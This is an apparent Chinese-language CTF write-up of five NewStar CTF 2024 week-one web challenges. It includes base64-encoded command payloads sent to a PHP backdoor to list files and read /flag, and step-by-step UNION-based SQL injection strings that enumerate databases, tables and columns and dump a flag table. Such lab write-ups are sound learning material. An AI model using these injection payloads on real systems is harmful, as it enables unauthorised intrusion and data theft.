NewStar CTF 2024-week1-web

headach3

题目提示:head
在这里插入图片描述我们右键点查看,在网络处添加HEAD请求头
在这里插入图片描述就得到了flag:flag{You_Ar3_R3Ally_A_9ooD_d0ctor}

会赢吗

在这里插入图片描述查看页面源代码,得到flag第一部分:ZmxhZ3tXQTB3
在这里插入图片描述继续访问/4cqu1siti0n
在这里插入图片描述查看页面源代码
在这里插入图片描述我们使用post方法请求接口,得到第二部分flag:IV95NF9yM2Fs
在这里插入图片描述我们继续访问下一个地址:/s34l
在这里插入图片描述在这里插入图片描述
在这里插入图片描述使用post方法请求数据为csrf_token=hfaousghashgfasbasiouwrda1_,得到第三部分flag:MXlfR3I0c1B
在这里插入图片描述访问/Ap3x
在这里插入图片描述查看页面源代码,使用post传参,数据为csrf_token=hfaousghashgfasbasiouwrda1_
在这里插入图片描述在这里插入图片描述最后得到了flag:fSkpKcyF9
我们合并得到的flag每个部分:ZmxhZ3tXQTB3IV95NF9yM2FsMXlfR3I0c1BfSkpKcyF9,进行解码flag:flag{WA0w!_y4_r3al1y_Gr4sP_JJJs!}

智械危机

在这里插入图片描述提示:robots.txt,发现一个backd0or.php
在这里插入图片描述访问这个php界面
分析代码:加密流程为post提交cmd和key,base解码key,cmd反转,MD5加密的反转cmd等于解密后的key,最后将cmd解码,最后逆向加密一下,就能得到flag
在这里插入图片描述构造payload:cmd=bHM=&key=N2FiZThiMjRiZDAxMzc0NDZmZDMzNmMyMjk4ZmNjYTA
在这里插入图片描述构造payload:cmd=bHMgLw==&key=ZTk0ZDNmOWQyNzBmNTczNGMwZTYwNDY3ZDQ0ZTdkNDY=
有回显,说明存在flag
在这里插入图片描述读取flag,构造payload:cmd=Y2F0IC9mbGFn&key=ODc5YTU5MWM2Nzg1YTRlMTM5OGI5NmE5YTFiYzY3ZWI=
在这里插入图片描述
于是得到flag:flag{d76bb5d2-d07a-e227-014f-b2193cf3eaad}

PangBai 过家家(1)

在这里插入图片描述去head看看,发现有一个新的地址
在这里插入图片描述进入新的界面,提示:Query一下
在这里插入图片描述GET传参?ask=miao
在这里插入图片描述post传参say=hello
在这里插入图片描述在这里插入图片描述我们再传一次试试
在这里插入图片描述修改代理人,改完发现还是显示只有Papa的话才能让她安心

在这里插入图片描述改了好几次发现要完整的value
在这里插入图片描述post传参say=玛卡巴卡阿卡哇卡米卡玛卡呣
在这里插入图片描述再进行一次post传参say=玛卡巴卡阿卡哇卡米卡玛卡呣
在这里插入图片描述额在这里卡住了,等我在想想

谢谢皮蛋

在这里插入图片描述爆库名:1 and 1=0 union select 1,group_concat(schema_name) from information_schema.schemata
在这里插入图片描述爆表:1 and 1=0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=“ctf”
在这里插入图片描述在进行爆列表:1 and 1=0 union select 1,group_concat(column_name) FROM information_schema.columns where table_schema=“A” and table_name=‘Fl4g’
发现回显了一个我SQL语法出现错误,并且提示我请检查与您的MariaDB服务器版本相对应的手册(学的不精啊,找不到哪里出现了错误)
后面我看了官方的题解,以下是官方的一个解题过程:
首先查看当前数据库,-1 union select 1,database()#
在这里插入图片描述再查看当前数据库所有表名,即爆表,-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
在这里插入图片描述最后,爆列名:-1 union select 1,group_concat(column_name) from information_schema.columns where table_name=‘Fl4g’ and table_schema=database()#
在这里插入图片描述最后,查看flag值:-1 union select group_concat(des),group_concat(value) from Fl4g#,就得到了flag:flag{NEw5TaR_cTF-Z02413f1faa8443c}
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值